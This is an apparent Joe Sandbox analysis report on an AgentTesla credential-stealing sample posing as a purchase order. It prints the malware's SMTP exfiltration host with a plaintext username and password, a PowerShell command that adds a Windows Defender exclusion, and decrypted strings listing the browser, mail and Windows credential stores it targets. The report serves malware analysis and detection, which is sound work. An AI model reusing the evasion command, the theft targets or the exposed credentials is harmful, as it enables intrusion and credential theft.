Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PURCHASE ORDER-6350-2024.exe

Overview

General Information

Sample name:PURCHASE ORDER-6350-2024.exe
Analysis ID:1528943
MD5:e25b8037dca1fdb8e69cb26bd1cb4f17
SHA1:5a05ef1979ba60a139cb987e7ab3abf1115acba8
SHA256:42db38678ebdd31dbcab40014ff3b96a8b263f77e8484901226defbdfbb8eba6
Tags:AgentTeslaexeuser-threatcat_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • PURCHASE ORDER-6350-2024.exe (PID: 5688 cmdline: "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe" MD5: E25B8037DCA1FDB8E69CB26BD1CB4F17)
    • powershell.exe (PID: 6112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PURCHASE ORDER-6350-2024.exe (PID: 3732 cmdline: "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe" MD5: E25B8037DCA1FDB8E69CB26BD1CB4F17)
    • PURCHASE ORDER-6350-2024.exe (PID: 1020 cmdline: "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe" MD5: E25B8037DCA1FDB8E69CB26BD1CB4F17)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000002.3266110194.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.3264163729.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000000.00000002.2053479431.0000000003A29000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 5 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.PURCHASE ORDER-6350-2024.exe.3ab4e38.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.PURCHASE ORDER-6350-2024.exe.3ab4e38.4.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", ParentImage: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe, ParentProcessId: 5688, ParentProcessName: PURCHASE ORDER-6350-2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", ProcessId: 6112, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", ParentImage: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe, ParentProcessId: 5688, ParentProcessName: PURCHASE ORDER-6350-2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", ProcessId: 6112, ProcessName: powershell.exe
                        Sigma detected: Suspicious Outbound SMTP Connections
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe, Initiated: true, ProcessId: 1020, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", ParentImage: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe, ParentProcessId: 5688, ParentProcessName: PURCHASE ORDER-6350-2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", ProcessId: 6112, ProcessName: powershell.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-08T13:52:51.176172+020020301711A Network Trojan was detected192.168.2.549707199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-08T13:53:00.382718+020028555421A Network Trojan was detected192.168.2.549707199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-08T13:53:00.382718+020028552451A Network Trojan was detected192.168.2.549707199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-08T13:52:51.176172+020028397231Malware Command and Control Activity Detected192.168.2.549707199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-08T13:52:51.176172+020028400321A Network Trojan was detected192.168.2.549707199.79.62.115587TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Found malware configuration
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
                        Multi AV Scanner detection for submitted file
                        Source: PURCHASE ORDER-6350-2024.exeReversingLabs: Detection: 21%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for sample
                        Source: PURCHASE ORDER-6350-2024.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: /log.tmp
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <br>[
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ]<br>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <br>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Time:
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <br>User Name:
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <br>Computer Name:
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <br>OSFullName:
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <br>CPU:
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <br>RAM:
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <br>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: IP Address:
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <br>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <hr>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: New
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: IP Address:
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: false
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: false
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: false
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: false
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: false
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: false
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: false
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: false
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: false
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: mail.mbarieservicesltd.com
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: saless@mbarieservicesltd.com
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: *o9H+18Q4%;M
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: iinfo@mbarieservicesltd.com
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: false
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: false
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: appdata
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: KTvkzEc
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: KTvkzEc.exe
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: KTvkzEc
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Type
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <br>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <hr>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <br>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <b>[
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ]</b> (
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: )<br>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {BACK}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {ALT+TAB}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {ALT+F4}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {TAB}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {ESC}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {Win}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {CAPSLOCK}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {KEYUP}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {KEYDOWN}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {KEYLEFT}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {KEYRIGHT}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {DEL}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {END}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {HOME}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {Insert}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {NumLock}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {PageDown}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {PageUp}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {ENTER}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {F1}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {F2}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {F3}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {F4}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {F5}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {F6}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {F7}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {F8}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {F9}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {F10}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {F11}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {F12}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: control
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: {CTRL}
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: &amp;
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: &lt;
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: &gt;
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: &quot;
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <br><hr>Copied Text: <br>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <hr>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: logins
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: IE/Edge
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Windows Secure Note
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Windows Web Password Credential
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Windows Credential Picker Protector
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Web Credentials
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Windows Credentials
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Windows Domain Certificate Credential
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Windows Domain Password Credential
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Windows Extended Credential
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SchemaId
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: pResourceElement
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: pIdentityElement
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: pPackageSid
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: pAuthenticatorElement
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: IE/Edge
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: UC Browser
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: UCBrowser\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Login Data
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: journal
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: wow_logins
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Safari for Windows
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <array>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <dict>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <string>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </string>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <string>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </string>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <data>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </data>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: -convert xml1 -s -o "
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \fixed_keychain.xml"
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Microsoft\Protect\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: credential
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: QQ Browser
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Tencent\QQBrowser\User Data
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Default\EncryptedStorage
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Profile
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \EncryptedStorage
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: entries
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: category
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: str3
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: str2
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: blob0
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: password_value
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: IncrediMail
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: PopPassword
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SmtpPassword
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\IncrediMail\Identities\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Accounts_New
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: PopPassword
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SmtpPassword
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SmtpServer
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: EmailAddress
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Eudora
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: current
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Settings
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SavePasswordText
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Settings
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ReturnAddress
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Falkon Browser
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \falkon\profiles\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: profiles.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: profiles.ini
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \browsedata.db
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: autofill
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ClawsMail
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Claws-mail
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \clawsrc
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \clawsrc
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: passkey0
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: master_passphrase_salt=(.+)
